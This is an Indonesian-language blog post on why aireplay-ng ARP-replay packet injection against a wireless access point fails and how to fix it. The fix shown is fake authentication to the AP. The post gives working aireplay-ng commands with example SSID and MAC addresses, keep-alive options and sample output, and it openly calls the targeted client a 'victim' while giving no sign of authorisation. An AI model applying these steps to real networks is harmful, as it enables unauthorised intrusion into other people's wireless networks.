Failed injection packet to AP

Pernah ketemu kasus seperti ini ketika lagi asik-asiknya menginjeksi paket di jaringan wireless?

Saving ARP requests in replay_arp-0123-104950.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 17915 packets (got 3 ARP requests), sent 5854 packets...

Yup, kasus tersebut terjadi karena alamat MAC korban tidak lagi berasosiasi dengan Access Point setempat atau bisa dibilang lagi putus-putus, entah akibat proses de-authentication yang kita buat sendiri atau memang sinyalnya ga bagus untuk sampai di laptop/pc korban. Nah, untuk menyiasatinya ada 3 cara:

  1. Ganti dengan alamat MAC korban yang lain.
  2. Pancing dengan 1 kartu jaringan wireless lain (musti ada 2 buah kartu jaringan)
  3. Bikin fake authentication ke AP

Untuk cara yang pertama cukup mudah, tinggal matikan proses aireplay-ng yang sedang berjalan, lalu ganti dengan alamat MAC korban yang tergabung dalam satu AP yang sama. Pada cara yang kedua, kita tinggal menghidupkan kartu jaringan yang kedua (biasanya PCMCIA/USB card) lalu kirimkan paket ke AP atau cukup dengan mengirimkan ping ke internet. Yang mau saya bahas disini adalah cara ketiga, yaitu dengan membuat fake authentication ke AP, caranya:

aireplay-ng -1 0 -e <SSID> -a <bssid MAC address> -h <source MAC address> wifi0
aireplay-ng -1 0 -e linksys -a 00:18:F8:E1:76:BD -h 00:0F:54:3C:65:93 wifi0

 

Kalau sukses akan terlihat seperti ini:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful 🙂

Atau dengan cara lain untuk keep-alive packet injection seperti ini:

aireplay-ng -1 6000 -o 1 -q 10 -e linksys -a 00:18:F8:E1:76:BD
-h 00:0F:54:3C:65:93 wifi0

yang berarti:

  • 6000 – Melakukan re-autentikasi setiap 6000 detik.
  • -o 1 – Hanya mengirim satu paket untuk satu waktu.
  • -q 10 – Mengirim paket keep-alive setiap 10 detik.

hasilnya akan seperti ini:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful 🙂
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# dan seterusnya.

Selanjutnya kita bisa melanjutkan proses injeksi paket di jaringan wireless tersebut dengan santai ^^

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Thomas Gregory

Jai Guru Deva. What the eyes see and the ears hear, the mind believes. Gamer. Free thinker. Pwning @Spentera !